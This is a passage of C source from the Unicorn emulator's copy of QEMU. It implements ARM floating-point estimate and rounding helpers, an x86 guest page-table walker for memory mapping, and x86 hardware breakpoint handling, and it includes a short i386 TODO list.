float_flag_inexact, fpst); if (round_to_inf(fpst, f64_sign)) { return float64_set_sign(float64_infinity, f64_sign); } else { return float64_set_sign(float64_maxnorm, f64_sign); } } else if (f64_exp >= 2045 && fpst->flush_to_zero) { float_raise(float_flag_underflow, fpst); return float64_set_sign(float64_zero, float64_is_neg(f64)); } f64_frac = call_recip_estimate(&f64_exp, 2045, f64_frac); /* result = sign : result_exp<10:0> : fraction<51:0>; */ f64_val = deposit64(0, 63, 1, f64_sign); f64_val = deposit64(f64_val, 52, 11, f64_exp); f64_val = deposit64(f64_val, 0, 52, f64_frac); return make_float64(f64_val); } /* The algorithm that must be used to calculate the estimate * is specified by the ARM ARM. 
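 *
 * Here the input a/512 represents a value 0.25 <= x < 1.0 (with
 * 128 <= a < 512 and a < 256 corresponding to an odd exponent), and
 * the result r/256 approximates 1/sqrt(x): e.g. a = 128 (0.25) gives
 * r = 511 (~2.0) and a = 256 (0.5) gives r = 361 (~sqrt(2)).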
*/ static int do_recip_sqrt_estimate(int a) { int b, estimate; assert(128 <= a && a < 512); if (a < 256) { a = a * 2 + 1; } else { a = (a >> 1) << 1; a = (a + 1) * 2; } b = 512; while (a * (b + 1) * (b + 1) < (1 << 28)) { b += 1; } estimate = (b + 1) / 2; assert(256 <= estimate && estimate < 512); return estimate; } static uint64_t recip_sqrt_estimate(int *exp , int exp_off, uint64_t frac) { int estimate; uint32_t scaled; if (*exp == 0) { while (extract64(frac, 51, 1) == 0) { frac = frac << 1; *exp -= 1; } frac = extract64(frac, 0, 51) << 1; } if (*exp & 1) { /* scaled = UInt('01':fraction<51:45>) */ scaled = deposit32(1 << 7, 0, 7, extract64(frac, 45, 7)); } else { /* scaled = UInt('1':fraction<51:44>) */ scaled = deposit32(1 << 8, 0, 8, extract64(frac, 44, 8)); } estimate = do_recip_sqrt_estimate(scaled); *exp = (exp_off - *exp) / 2; return extract64(estimate, 0, 8) << 44; } uint32_t HELPER(rsqrte_f16)(uint32_t input, void *fpstp) { float_status *s = fpstp; float16 f16 = float16_squash_input_denormal(input, s); uint16_t val = float16_val(f16); bool f16_sign = float16_is_neg(f16); int f16_exp = extract32(val, 10, 5); uint16_t f16_frac = extract32(val, 0, 10); uint64_t f64_frac; if (float16_is_any_nan(f16)) { float16 nan = f16; if (float16_is_signaling_nan(f16, s)) { float_raise(float_flag_invalid, s); nan = float16_silence_nan(f16, s); } if (s->default_nan_mode) { nan = float16_default_nan(s); } return nan; } else if (float16_is_zero(f16)) { float_raise(float_flag_divbyzero, s); return float16_set_sign(float16_infinity, f16_sign); } else if (f16_sign) { float_raise(float_flag_invalid, s); return float16_default_nan(s); } else if (float16_is_infinity(f16)) { return float16_zero; } /* Scale and normalize to a double-precision value between 0.25 and 1.0, * preserving the parity of the exponent. */ f64_frac = ((uint64_t) f16_frac) << (52 - 10); f64_frac = recip_sqrt_estimate(&f16_exp, 44, f64_frac); /* result = sign : result_exp<4:0> : estimate<7:0> : Zeros(2) */ val = deposit32(0, 15, 1, f16_sign); val = deposit32(val, 10, 5, f16_exp); val = deposit32(val, 2, 8, extract64(f64_frac, 52 - 8, 8)); return make_float16(val); } float32 HELPER(rsqrte_f32)(float32 input, void *fpstp) { float_status *s = fpstp; float32 f32 = float32_squash_input_denormal(input, s); uint32_t val = float32_val(f32); uint32_t f32_sign = float32_is_neg(f32); int f32_exp = extract32(val, 23, 8); uint32_t f32_frac = extract32(val, 0, 23); uint64_t f64_frac; if (float32_is_any_nan(f32)) { float32 nan = f32; if (float32_is_signaling_nan(f32, s)) { float_raise(float_flag_invalid, s); nan = float32_silence_nan(f32, s); } if (s->default_nan_mode) { nan = float32_default_nan(s); } return nan; } else if (float32_is_zero(f32)) { float_raise(float_flag_divbyzero, s); return float32_set_sign(float32_infinity, float32_is_neg(f32)); } else if (float32_is_neg(f32)) { float_raise(float_flag_invalid, s); return float32_default_nan(s); } else if (float32_is_infinity(f32)) { return float32_zero; } /* Scale and normalize to a double-precision value between 0.25 and 1.0, * preserving the parity of the exponent. 
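 * recip_sqrt_estimate() halves the exponent, so the exponent's low bit
 * selects which of its two fraction scalings is applied.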
*/ f64_frac = ((uint64_t) f32_frac) << 29; f64_frac = recip_sqrt_estimate(&f32_exp, 380, f64_frac); /* result = sign : result_exp<4:0> : estimate<7:0> : Zeros(15) */ val = deposit32(0, 31, 1, f32_sign); val = deposit32(val, 23, 8, f32_exp); val = deposit32(val, 15, 8, extract64(f64_frac, 52 - 8, 8)); return make_float32(val); } float64 HELPER(rsqrte_f64)(float64 input, void *fpstp) { float_status *s = fpstp; float64 f64 = float64_squash_input_denormal(input, s); uint64_t val = float64_val(f64); bool f64_sign = float64_is_neg(f64); int f64_exp = extract64(val, 52, 11); uint64_t f64_frac = extract64(val, 0, 52); if (float64_is_any_nan(f64)) { float64 nan = f64; if (float64_is_signaling_nan(f64, s)) { float_raise(float_flag_invalid, s); nan = float64_silence_nan(f64, s); } if (s->default_nan_mode) { nan = float64_default_nan(s); } return nan; } else if (float64_is_zero(f64)) { float_raise(float_flag_divbyzero, s); return float64_set_sign(float64_infinity, float64_is_neg(f64)); } else if (float64_is_neg(f64)) { float_raise(float_flag_invalid, s); return float64_default_nan(s); } else if (float64_is_infinity(f64)) { return float64_zero; } f64_frac = recip_sqrt_estimate(&f64_exp, 3068, f64_frac); /* result = sign : result_exp<4:0> : estimate<7:0> : Zeros(44) */ val = deposit64(0, 61, 1, f64_sign); val = deposit64(val, 52, 11, f64_exp); val = deposit64(val, 44, 8, extract64(f64_frac, 52 - 8, 8)); return make_float64(val); } uint32_t HELPER(recpe_u32)(uint32_t a, void *fpstp) { /* float_status *s = fpstp; */ int input, estimate; if ((a & 0x80000000) == 0) { return 0xffffffff; } input = extract32(a, 23, 9); estimate = recip_estimate(input); return deposit32(0, (32 - 9), 9, estimate); } uint32_t HELPER(rsqrte_u32)(uint32_t a, void *fpstp) { int estimate; if ((a & 0xc0000000) == 0) { return 0xffffffff; } estimate = do_recip_sqrt_estimate(extract32(a, 23, 9)); return deposit32(0, 23, 9, estimate); } /* VFPv4 fused multiply-accumulate */ float32 VFP_HELPER(muladd, s)(float32 a, float32 b, float32 c, void *fpstp) { float_status *fpst = fpstp; return float32_muladd(a, b, c, 0, fpst); } float64 VFP_HELPER(muladd, d)(float64 a, float64 b, float64 c, void *fpstp) { float_status *fpst = fpstp; return float64_muladd(a, b, c, 0, fpst); } /* ARMv8 round to integral */ float32 HELPER(rints_exact)(float32 x, void *fp_status) { return float32_round_to_int(x, fp_status); } float64 HELPER(rintd_exact)(float64 x, void *fp_status) { return float64_round_to_int(x, fp_status); } float32 HELPER(rints)(float32 x, void *fp_status) { int old_flags = get_float_exception_flags(fp_status), new_flags; float32 ret; ret = float32_round_to_int(x, fp_status); /* Suppress any inexact exceptions the conversion produced */ if (!(old_flags & float_flag_inexact)) { new_flags = get_float_exception_flags(fp_status); set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); } return ret; } float64 HELPER(rintd)(float64 x, void *fp_status) { int old_flags = get_float_exception_flags(fp_status), new_flags; float64 ret; ret = float64_round_to_int(x, fp_status); new_flags = get_float_exception_flags(fp_status); /* Suppress any inexact exceptions the conversion produced */ if (!(old_flags & float_flag_inexact)) { new_flags = get_float_exception_flags(fp_status); set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); } return ret; } /* Convert ARM rounding mode to softfloat */ int arm_rmode_to_sf(int rmode) { switch (rmode) { case FPROUNDING_TIEAWAY: rmode = float_round_ties_away; break; case FPROUNDING_ODD: /* 
FIXME: add support for TIEAWAY and ODD */ qemu_log_mask(LOG_UNIMP, "arm: unimplemented rounding mode: %d\n", rmode); /* fall through for now */ case FPROUNDING_TIEEVEN: default: rmode = float_round_nearest_even; break; case FPROUNDING_POSINF: rmode = float_round_up; break; case FPROUNDING_NEGINF: rmode = float_round_down; break; case FPROUNDING_ZERO: rmode = float_round_to_zero; break; } return rmode; } /* * Implement float64 to int32_t conversion without saturation; * the result is supplied modulo 2^32. */ uint64_t HELPER(fjcvtzs)(float64 value, void *vstatus) { float_status *status = vstatus; uint32_t exp, sign; uint64_t frac; uint32_t inexact = 1; /* !Z */ sign = extract64(value, 63, 1); exp = extract64(value, 52, 11); frac = extract64(value, 0, 52); if (exp == 0) { /* While not inexact for IEEE FP, -0.0 is inexact for JavaScript. */ inexact = sign; if (frac != 0) { if (status->flush_inputs_to_zero) { float_raise(float_flag_input_denormal, status); } else { float_raise(float_flag_inexact, status); inexact = 1; } } frac = 0; } else if (exp == 0x7ff) { /* This operation raises Invalid for both NaN and overflow (Inf). */ float_raise(float_flag_invalid, status); frac = 0; } else { int true_exp = exp - 1023; int shift = true_exp - 52; /* Restore implicit bit. */ frac |= 1ull << 52; /* Shift the fraction into place. */ if (shift >= 0) { /* The number is so large we must shift the fraction left. */ if (shift >= 64) { /* The fraction is shifted out entirely. */ frac = 0; } else { frac <<= shift; } } else if (shift > -64) { /* Normal case -- shift right and notice if bits shift out. */ inexact = (frac << (64 + shift)) != 0; frac >>= -shift; } else { /* The fraction is shifted out entirely. */ frac = 0; } /* Notice overflow or inexact exceptions. */ if (true_exp > 31 || frac > (sign ? 0x80000000ull : 0x7fffffff)) { /* Overflow, for which this operation raises invalid. */ float_raise(float_flag_invalid, status); inexact = 1; } else if (inexact) { float_raise(float_flag_inexact, status); } /* Honor the sign. */ if (sign) { #ifdef _MSC_VER frac = 0 - frac; #else frac = -frac; #endif } } /* Pack the result and the env->ZF representation of Z together. */ return deposit64(frac, 32, 32, inexact); } uint32_t HELPER(vjcvt)(float64 value, CPUARMState *env) { uint64_t pair = HELPER(fjcvtzs)(value, &env->vfp.fp_status); uint32_t result = pair; uint32_t z = (pair >> 32) == 0; /* Store Z, clear NCV, in FPSCR.NZCV. */ env->vfp.xregs[ARM_VFP_FPSCR] = (env->vfp.xregs[ARM_VFP_FPSCR] & ~CPSR_NZCV) | (z * CPSR_Z); return result; } /* Round a float32 to an integer that fits in int32_t or int64_t. */ static float32 frint_s(float32 f, float_status *fpst, int intsize) { int old_flags = get_float_exception_flags(fpst); uint32_t exp = extract32(f, 23, 8); if (unlikely(exp == 0xff)) { /* NaN or Inf. */ goto overflow; } /* Round and re-extract the exponent. */ f = float32_round_to_int(f, fpst); exp = extract32(f, 23, 8); /* Validate the range of the result. */ if (exp < 126 + intsize) { /* abs(F) <= INT{N}_MAX */ return f; } if (exp == 126 + intsize) { uint32_t sign = extract32(f, 31, 1); uint32_t frac = extract32(f, 0, 23); if (sign && frac == 0) { /* F == INT{N}_MIN */ return f; } } overflow: /* * Raise Invalid and return INT{N}_MIN as a float. Revert any * inexact exception float32_round_to_int may have raised. 
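 * The constant built below packs sign = 1, exponent = 126 + intsize,
 * fraction = 0, i.e. -2^intsize: 0xcf000000 == (float)INT32_MIN for
 * intsize == 32.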
*/
    set_float_exception_flags(old_flags | float_flag_invalid, fpst);
    return (0x100u + 126u + intsize) << 23;
}

float32 HELPER(frint32_s)(float32 f, void *fpst)
{
    return frint_s(f, fpst, 32);
}

float32 HELPER(frint64_s)(float32 f, void *fpst)
{
    return frint_s(f, fpst, 64);
}

/* Round a float64 to an integer that fits in int32_t or int64_t. */
static float64 frint_d(float64 f, float_status *fpst, int intsize)
{
    int old_flags = get_float_exception_flags(fpst);
    uint32_t exp = extract64(f, 52, 11);

    if (unlikely(exp == 0x7ff)) {
        /* NaN or Inf. */
        goto overflow;
    }

    /* Round and re-extract the exponent. */
    f = float64_round_to_int(f, fpst);
    exp = extract64(f, 52, 11);

    /* Validate the range of the result. */
    if (exp < 1022 + intsize) {
        /* abs(F) <= INT{N}_MAX */
        return f;
    }
    if (exp == 1022 + intsize) {
        uint64_t sign = extract64(f, 63, 1);
        uint64_t frac = extract64(f, 0, 52);
        if (sign && frac == 0) {
            /* F == INT{N}_MIN */
            return f;
        }
    }

 overflow:
    /*
     * Raise Invalid and return INT{N}_MIN as a float.  Revert any
     * inexact exception float64_round_to_int may have raised.
     */
    set_float_exception_flags(old_flags | float_flag_invalid, fpst);
    return (uint64_t)(0x800 + 1022 + intsize) << 52;
}

float64 HELPER(frint32_d)(float64 f, void *fpst)
{
    return frint_d(f, fpst, 32);
}

float64 HELPER(frint64_d)(float64 f, void *fpst)
{
    return frint_d(f, fpst, 64);
}

void HELPER(check_hcr_el2_trap)(CPUARMState *env, uint32_t rt, uint32_t reg)
{
    uint32_t syndrome;

    switch (reg) {
    case ARM_VFP_MVFR0:
    case ARM_VFP_MVFR1:
    case ARM_VFP_MVFR2:
        if (!(arm_hcr_el2_eff(env) & HCR_TID3)) {
            return;
        }
        break;
    case ARM_VFP_FPSID:
        if (!(arm_hcr_el2_eff(env) & HCR_TID0)) {
            return;
        }
        break;
    default:
        g_assert_not_reached();
        break;
    }

    syndrome = ((EC_FPIDTRAP << ARM_EL_EC_SHIFT)
                | ARM_EL_IL
                | (1 << 24) | (0xe << 20) | (7 << 14)
                | (reg << 10) | (rt << 5) | 1);

    raise_exception(env, EXCP_HYP_TRAP, syndrome, 2);
}

unicorn-2.1.1/qemu/target/i386/TODO

Correctness issues:

- some eflags manipulation incorrectly reset the bit 0x2.
- SVM: test, cpu save/restore, SMM save/restore.
- x86_64: lcall/ljmp intel/amd differences ?
- better code fetch (different exception handling + CS.limit support)
- user/kernel PUSHL/POPL in helper.c
- add missing cpuid tests
- return UD exception if LOCK prefix incorrectly used
- test ldt limit < 7 ?
- fix some 16 bit sp push/pop overflow (pusha/popa, lcall lret)
- full support of segment limit/rights
- full x87 exception support
- improve x87 bit exactness (use bochs code ?)
- DRx register support
- CR0.AC emulation
- SSE alignment checks

Optimizations/Features:

- add SVM nested paging support
- add VMX support
- add AVX support
- add SSE5 support
- fxsave/fxrstor AMD extensions
- improve monitor/mwait support
- faster EFLAGS update: consider SZAP, C, O can be updated separately
  with a bit field in CC_OP and more state variables.
- evaluate x87 stack pointer statically
- find a way to avoid translating the same TB several times if CR0.TS
  is set or not.

unicorn-2.1.1/qemu/target/i386/arch_memory_mapping.c

/*
 * i386 memory mapping
 *
 * Copyright Fujitsu, Corp. 2011, 2012
 *
 * Authors:
 *     Wen Congyang <wency@cn.fujitsu.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
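 *
 * This file walks the guest's 32-bit, PAE or IA-32e page tables and
 * builds a sorted list of virtual-to-physical ranges for the memory
 * mapping API.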
* */ #include "qemu/osdep.h" #include "cpu.h" #include "sysemu/memory_mapping.h" /* PAE Paging or IA-32e Paging */ static void walk_pte(MemoryMappingList *list, AddressSpace *as, hwaddr pte_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pte_addr, start_paddr; uint64_t pte; target_ulong start_vaddr; int i; for (i = 0; i < 512; i++) { pte_addr = (pte_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pte = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pte = address_space_ldq(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pte & PG_PRESENT_MASK)) { /* not present */ continue; } start_paddr = (pte & ~0xfff) & ~(0x1ULL << 63); if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = start_line_addr | ((i & 0x1ff) << 12); memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 12); } } /* 32-bit Paging */ static void walk_pte2(MemoryMappingList *list, AddressSpace *as, hwaddr pte_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pte_addr, start_paddr; uint32_t pte; target_ulong start_vaddr; int i; for (i = 0; i < 1024; i++) { pte_addr = (pte_start_addr + i * 4) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pte = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pte = address_space_ldl(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pte & PG_PRESENT_MASK)) { /* not present */ continue; } start_paddr = pte & ~0xfff; if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = start_line_addr | ((i & 0x3ff) << 12); memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 12); } } /* PAE Paging or IA-32e Paging */ #define PLM4_ADDR_MASK 0xffffffffff000ULL /* selects bits 51:12 */ static void walk_pde(MemoryMappingList *list, AddressSpace *as, hwaddr pde_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pde_addr, pte_start_addr, start_paddr; uint64_t pde; target_ulong line_addr, start_vaddr; int i; for (i = 0; i < 512; i++) { pde_addr = (pde_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pde = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pde = address_space_ldq(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pde & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = start_line_addr | ((i & 0x1ff) << 21); if (pde & PG_PSE_MASK) { /* 2 MB page */ start_paddr = (pde & ~0x1fffff) & ~(0x1ULL << 63); if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = line_addr; memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 21); continue; } pte_start_addr = (pde & PLM4_ADDR_MASK) & a20_mask; walk_pte(list, as, pte_start_addr, a20_mask, line_addr); } } /* 32-bit Paging */ static void walk_pde2(MemoryMappingList *list, AddressSpace *as, hwaddr pde_start_addr, int32_t a20_mask, bool pse) { hwaddr pde_addr, pte_start_addr, start_paddr, high_paddr; uint32_t pde; target_ulong line_addr, start_vaddr; int i; for (i = 0; i < 1024; i++) { pde_addr = (pde_start_addr + i * 4) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pde = address_space_ldl(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pde & PG_PRESENT_MASK)) { /* not present */ 
continue; } line_addr = (((unsigned int)i & 0x3ff) << 22); if ((pde & PG_PSE_MASK) && pse) { /* * 4 MB page: * bits 39:32 are bits 20:13 of the PDE * bit3 31:22 are bits 31:22 of the PDE */ high_paddr = ((hwaddr)(pde & 0x1fe000) << 19); start_paddr = (pde & ~0x3fffff) | high_paddr; if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = line_addr; memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 22); continue; } pte_start_addr = (pde & ~0xfff) & a20_mask; walk_pte2(list, as, pte_start_addr, a20_mask, line_addr); } } /* PAE Paging */ static void walk_pdpe2(MemoryMappingList *list, AddressSpace *as, hwaddr pdpe_start_addr, int32_t a20_mask) { hwaddr pdpe_addr, pde_start_addr; uint64_t pdpe; target_ulong line_addr; int i; for (i = 0; i < 4; i++) { pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pdpe = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pdpe = address_space_ldq(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pdpe & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = (((unsigned int)i & 0x3) << 30); pde_start_addr = (pdpe & ~0xfff) & a20_mask; walk_pde(list, as, pde_start_addr, a20_mask, line_addr); } } #ifdef TARGET_X86_64 /* IA-32e Paging */ static void walk_pdpe(MemoryMappingList *list, AddressSpace *as, hwaddr pdpe_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pdpe_addr, pde_start_addr, start_paddr; uint64_t pdpe; target_ulong line_addr, start_vaddr; int i; for (i = 0; i < 512; i++) { pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pdpe = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pdpe = address_space_ldq(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pdpe & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = start_line_addr | ((i & 0x1ffULL) << 30); if (pdpe & PG_PSE_MASK) { /* 1 GB page */ start_paddr = (pdpe & ~0x3fffffff) & ~(0x1ULL << 63); if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = line_addr; memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 30); continue; } pde_start_addr = (pdpe & PLM4_ADDR_MASK) & a20_mask; walk_pde(list, as, pde_start_addr, a20_mask, line_addr); } } /* IA-32e Paging */ static void walk_pml4e(MemoryMappingList *list, AddressSpace *as, hwaddr pml4e_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pml4e_addr, pdpe_start_addr; uint64_t pml4e; target_ulong line_addr; int i; for (i = 0; i < 512; i++) { pml4e_addr = (pml4e_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pml4e = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pml4e_addr, MEMTXATTRS_UNSPECIFIED, #else pml4e = address_space_ldq(as->uc, as, pml4e_addr, MEMTXATTRS_UNSPECIFIED, #endif NULL); if (!(pml4e & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = start_line_addr | ((i & 0x1ffULL) << 39); pdpe_start_addr = (pml4e & PLM4_ADDR_MASK) & a20_mask; walk_pdpe(list, as, pdpe_start_addr, a20_mask, line_addr); } } static void walk_pml5e(MemoryMappingList *list, AddressSpace *as, hwaddr pml5e_start_addr, int32_t a20_mask) { hwaddr pml5e_addr, pml4e_start_addr; uint64_t pml5e; target_ulong line_addr; int i; for (i = 0; i < 512; i++) { pml5e_addr = (pml5e_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pml5e = glue(address_space_ldq, 
UNICORN_ARCH_POSTFIX)(as->uc, as, pml5e_addr,
                                                      MEMTXATTRS_UNSPECIFIED,
#else
        pml5e = address_space_ldq(as->uc, as, pml5e_addr,
                                  MEMTXATTRS_UNSPECIFIED,
#endif
                                  NULL);
        if (!(pml5e & PG_PRESENT_MASK)) {
            /* not present */
            continue;
        }

        line_addr = (0x7fULL << 57) | ((i & 0x1ffULL) << 48);
        pml4e_start_addr = (pml5e & PLM4_ADDR_MASK) & a20_mask;
        walk_pml4e(list, as, pml4e_start_addr, a20_mask, line_addr);
    }
}
#endif

void x86_cpu_get_memory_mapping(CPUState *cs, MemoryMappingList *list)
{
    X86CPU *cpu = X86_CPU(cs);
    CPUX86State *env = &cpu->env;
    int32_t a20_mask;

    if (!cpu_paging_enabled(cs)) {
        /* paging is disabled */
        return;
    }

    a20_mask = x86_get_a20_mask(env);
    if (env->cr[4] & CR4_PAE_MASK) {
#ifdef TARGET_X86_64
        if (env->hflags & HF_LMA_MASK) {
            if (env->cr[4] & CR4_LA57_MASK) {
                hwaddr pml5e_addr;

                pml5e_addr = (env->cr[3] & PLM4_ADDR_MASK) & a20_mask;
                walk_pml5e(list, cs->as, pml5e_addr, a20_mask);
            } else {
                hwaddr pml4e_addr;

                pml4e_addr = (env->cr[3] & PLM4_ADDR_MASK) & a20_mask;
                walk_pml4e(list, cs->as, pml4e_addr, a20_mask,
                           0xffffULL << 48);
            }
        } else
#endif
        {
            hwaddr pdpe_addr;

            pdpe_addr = (env->cr[3] & ~0x1f) & a20_mask;
            walk_pdpe2(list, cs->as, pdpe_addr, a20_mask);
        }
    } else {
        hwaddr pde_addr;
        bool pse;

        pde_addr = (env->cr[3] & ~0xfff) & a20_mask;
        pse = !!(env->cr[4] & CR4_PSE_MASK);
        walk_pde2(list, cs->as, pde_addr, a20_mask, pse);
    }
}

unicorn-2.1.1/qemu/target/i386/bpt_helper.c

/*
 * i386 breakpoint helpers
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "exec/helper-proto.h"

static inline bool hw_local_breakpoint_enabled(unsigned long dr7, int index)
{
    return (dr7 >> (index * 2)) & 1;
}

static inline bool hw_global_breakpoint_enabled(unsigned long dr7, int index)
{
    return (dr7 >> (index * 2)) & 2;
}

static inline bool hw_breakpoint_enabled(unsigned long dr7, int index)
{
    return hw_global_breakpoint_enabled(dr7, index) ||
           hw_local_breakpoint_enabled(dr7, index);
}

static inline int hw_breakpoint_type(unsigned long dr7, int index)
{
    return (dr7 >> (DR7_TYPE_SHIFT + (index * 4))) & 3;
}

static inline int hw_breakpoint_len(unsigned long dr7, int index)
{
    int len = ((dr7 >> (DR7_LEN_SHIFT + (index * 4))) & 3);
    return (len == 2) ?
8 : len + 1; } static int hw_breakpoint_insert(CPUX86State *env, int index) { CPUState *cs = env_cpu(env); target_ulong dr7 = env->dr[7]; target_ulong drN = env->dr[index]; int err = 0; switch (hw_breakpoint_type(dr7, index)) { case DR7_TYPE_BP_INST: if (hw_breakpoint_enabled(dr7, index)) { err = cpu_breakpoint_insert(cs, drN, BP_CPU, &env->cpu_breakpoint[index]); } break; case DR7_TYPE_IO_RW: /* Notice when we should enable calls to bpt_io. */ return hw_breakpoint_enabled(env->dr[7], index) ? HF_IOBPT_MASK : 0; case DR7_TYPE_DATA_WR: if (hw_breakpoint_enabled(dr7, index)) { err = cpu_watchpoint_insert(cs, drN, hw_breakpoint_len(dr7, index), BP_CPU | BP_MEM_WRITE, &env->cpu_watchpoint[index]); } break; case DR7_TYPE_DATA_RW: if (hw_breakpoint_enabled(dr7, index)) { err = cpu_watchpoint_insert(cs, drN, hw_breakpoint_len(dr7, index), BP_CPU | BP_MEM_ACCESS, &env->cpu_watchpoint[index]); } break; } if (err) { env->cpu_breakpoint[index] = NULL; } return 0; } static void hw_breakpoint_remove(CPUX86State *env, int index) { CPUState *cs = env_cpu(env); switch (hw_breakpoint_type(env->dr[7], index)) { case DR7_TYPE_BP_INST: if (env->cpu_breakpoint[index]) { cpu_breakpoint_remove_by_ref(cs, env->cpu_breakpoint[index]); env->cpu_breakpoint[index] = NULL; } break; case DR7_TYPE_DATA_WR: case DR7_TYPE_DATA_RW: if (env->cpu_breakpoint[index]) { cpu_watchpoint_remove_by_ref(cs, env->cpu_watchpoint[index]); env->cpu_breakpoint[index] = NULL; } break; case DR7_TYPE_IO_RW: /* HF_IOBPT_MASK cleared elsewhere. */ break; } } void cpu_x86_update_dr7(CPUX86State *env, uint32_t new_dr7) { target_ulong old_dr7 = env->dr[7]; int iobpt = 0; int i; new_dr7 |= DR7_FIXED_1; /* If nothing is changing except the global/local enable bits, then we can make the change more efficient. */ if (((old_dr7 ^ new_dr7) & ~0xff) == 0) { /* Fold the global and local enable bits together into the global fields, then xor to show which registers have changed collective enable state. 
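 *
 * For example, with only L0 (bit 0) set in old_dr7 and only G0
 * (bit 1) set in new_dr7, both fold to bit 1, so mod has bit 1
 * clear and breakpoint 0 is correctly left installed.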
*/ int mod = ((old_dr7 | old_dr7 * 2) ^ (new_dr7 | new_dr7 * 2)) & 0xff; for (i = 0; i < DR7_MAX_BP; i++) { if ((mod & (2 << i * 2)) && !hw_breakpoint_enabled(new_dr7, i)) { hw_breakpoint_remove(env, i); } } env->dr[7] = new_dr7; for (i = 0; i < DR7_MAX_BP; i++) { if (mod & (2 << i * 2) && hw_breakpoint_enabled(new_dr7, i)) { iobpt |= hw_breakpoint_insert(env, i); } else if (hw_breakpoint_type(new_dr7, i) == DR7_TYPE_IO_RW && hw_breakpoint_enabled(new_dr7, i)) { iobpt |= HF_IOBPT_MASK; } } } else { for (i = 0; i < DR7_MAX_BP; i++) { hw_breakpoint_remove(env, i); } env->dr[7] = new_dr7; for (i = 0; i < DR7_MAX_BP; i++) { iobpt |= hw_breakpoint_insert(env, i); } } env->hflags = (env->hflags & ~HF_IOBPT_MASK) | iobpt; } static bool check_hw_breakpoints(CPUX86State *env, bool force_dr6_update) { target_ulong dr6; int reg; bool hit_enabled = false; dr6 = env->dr[6] & ~0xf; for (reg = 0; reg < DR7_MAX_BP; reg++) { bool bp_match = false; bool wp_match = false; switch (hw_breakpoint_type(env->dr[7], reg)) { case DR7_TYPE_BP_INST: if (env->dr[reg] == env->eip) { bp_match = true; } break; case DR7_TYPE_DATA_WR: case DR7_TYPE_DATA_RW: if (env->cpu_watchpoint[reg] && env->cpu_watchpoint[reg]->flags & BP_WATCHPOINT_HIT) { wp_match = true; } break; case DR7_TYPE_IO_RW: break; } if (bp_match || wp_match) { dr6 |= 1ULL << reg; if (hw_breakpoint_enabled(env->dr[7], reg)) { hit_enabled = true; } } } if (hit_enabled || force_dr6_update) { env->dr[6] = dr6; } return hit_enabled; } void breakpoint_handler(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; CPUBreakpoint 